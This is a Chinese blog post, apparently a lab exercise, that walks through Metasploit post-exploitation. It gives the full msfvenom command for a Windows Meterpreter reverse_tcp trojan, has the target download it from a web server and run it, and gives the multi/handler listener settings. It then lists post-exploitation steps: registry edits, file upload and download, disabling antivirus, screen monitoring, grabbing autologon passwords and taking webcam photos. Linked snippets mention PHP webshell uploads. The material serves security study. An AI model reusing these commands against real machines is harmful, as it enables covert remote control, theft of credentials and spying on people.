首页 > 其他分享 >后渗透

后渗透

时间:2023-11-11 21:23:00浏览次数:50  
标签:shell 渗透 bilibili exe 木马 哔哩 Meterpreter

 

1.生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lport=4444 -f exe >shell.exe

2.将生成的木马移动到/var/www/html目录下

3.打开apache2

4.靶机和虚拟机相互ping

6b1af73ebee3978213be86237e1faaf

5.靶机在网址上搜索192.168.40.129(虚拟机ip)/shell.exe下载文件

6.打开msfconsole

7.

use exploit/multi/handler #加载模块
set payload windows/meterpreter/reverse_tcp #修改成我们之前生成木马时使用的payload
set lhost 192.168.110.140 #设置kali的IP地址为监听地址
set lport 4444 #设置监听端口

8.靶机点开shell.exe文件

bb14d9afd48574bc464119902d97714

  • 修改注册表

  • 查看开放的服务

shell回车

d4c705feb9bb523424b3de51717b6a3

  • 上传文件

  • 下载文件

  • 关闭杀毒软件

安装火绒安全再试一遍

Shell.exe被安全软件发现并清除

小彩蛋:

  • 屏幕监控

Ctrl+C退出

  • 查看目标机是否在虚拟机上

  • 抓取自动登录的用户和密码

由于不是自动登录的,所以不显示

  • 打开相机拍摄照片

相机关闭

参考资料:

msfvenom生成木马的简单利用 - 知乎 (zhihu.com)

【精选】后渗透之关闭防火墙、杀毒软件并开启远程桌面_msf进入meterpteter会话后关闭防火墙命令_~Echo的博客-CSDN博客

Metasploit之后渗透攻击(信息收集、权限提升) - coderge - 博客园 (cnblogs.com)

第十一课 - Meterpreter概括_哔哩哔哩_bilibili

第十二课 - Meterpreter文件操作_哔哩哔哩_bilibili

第十三课 - Meterpreter系统操作_哔哩哔哩_bilibili

第十四课 - Meterpreter网络操作_哔哩哔哩_bilibili

第十五课 - Meterpreter其它操作_哔哩哔哩_bilibili

标签:shell,渗透,bilibili,exe,木马,哔哩,Meterpreter
From: https://www.cnblogs.com/dgutwan/p/17826377.html

相关文章

  • DVWA文件上传低级渗透流程(手把手教你)
    低级的文件上传环境没有进行过滤,所以可以直接上传一个php的木马文件,然后使用工具进行连接,进而获取到目标机器的图形化界面首先创建一个php的一句话木马文件保存为php格式,确定保存进入到上传文件的页面将方框内的相对路径复制粘贴到URL后面即可获得木马文件的绝对路径进入后若为空......
  • DVWA文件上传中级渗透流程(手把手教你)
    由于中级难度在前端页面进行了过滤,不允许php文件进行上传。所以我们需要在前端页面进行绕过,从而把文件上传到后端。首先在kali环境将kali用户切换到root管理员用户密码为kali打开burp抓包软件,burp软件能够在前端验证通过后,数据传到后端之前对数据包拦截,可以对数据包进行修改优化后......
  • 渗透学习1.1 信息收集之google hacking
    0x0前言  google是一款非常强大的搜索引擎,相对来说广告较少,查询结果全面,通常我们的使用方式是在搜索框输入想要查询的词汇,一般来说我们很容易搜索到想要的结果,但是Google也可以通过特定的语法对查询结果进行筛选,甚至可以对网页内容,文件,路径,建站模板等进行匹配,便于我们发现可......
  • 内网渗透-防火墙出入规则上线-正反向连接+隧道技术-SMB+防火墙控制
    环境:如下图 不出网-控制上线-CS-反向连接前提:已经使用攻击机通过漏洞拿下了windows7主机,又通过windows7正向连接拿下了windows10。 目的:让windows2008在cs上线。      想要通过windows10正向连接拿下windows2008时,发现windows2008开启了防火墙对入站规则做了限制,无法正向......
  • 渗透测试第一次实验
     虚拟机和主机链接方式:桥接模式:就可与i将虚拟机看成是局域网中的独立主机(如下图,AB就是使用NAT模式)NAT模式:则是将物理机当作为路由器,虚拟机为内网中的一台主机(如下图,AC就是使用NAT模式)Host模式:就是将虚拟机和物理机看成一个网络,与外界隔绝        ......
  • 渗透中 PoC、Exp、Payload、RCE、IOC,Shellcode 的区别
    PoC:全称“ProofofConcept”,中文“概念验证”,常指段漏洞证明的代码。Exp:全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作作。Payload:中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令RCE:RCE(remotecommand/codeexecute)可以让攻击......
  • Metasploit渗透测试框架的基本使用
    一、Metasploit渗透测试框架介绍(1)基础库metasploit基础库文件位于源码根目录路径下的libraries目录中,包括Rex,framework-core和framework-base三部分。Rex是整个框架所依赖的最基础的一些组件,如包装的网络套接字、网络应用协议客户端与服务端实现、日志子系统、渗透攻击支持例......
  • 模拟攻击beescms框架网站,并且一步一步渗透测试,上传shell,连接蚁剑,拿到对方网站根目录
    打开网站发现它是beescms框架搭建的网站,一言不合直接用webpathbrute扫描发现了管理员登录页面尝试任意用户名密码登录发现不太行,直接暴力破解,先burp抓数据包发现有4个参数有user,password,code,submit,把submit=ture修改为submit=false验证码就不会刷新了就是284c。接下来......
  • App渗透测试有哪些测试方法?可进行移动app测试的公司推荐
    App渗透测试是当前互联网时代中不可或缺的重要环节。随着智能手机的普及和App应用的广泛使用,App渗透测试帮助企业保障其移动应用的安全性和可靠性,确保用户的隐私和敏感信息不会被黑客窃取。那么,什么是App渗透测试呢?它有哪些测试方法?接下来,我们将为您一一详细解答。App渗......
  • 记一次实战渗透测试
    前言之前一个朋友叫我帮忙测试一下他们公司的网站信息收集使用插件Wappalyzer探测信息首先使用Nmap扫描了一下端口,因为扫描高危端口,往往有意外收获。开放了21,80,3306,3389,8001端口,于是尝试匿名登录ftp,无果,爆破3306和3389远程桌面,爆了半天也没爆出来然后御剑目录扫描扫描网站......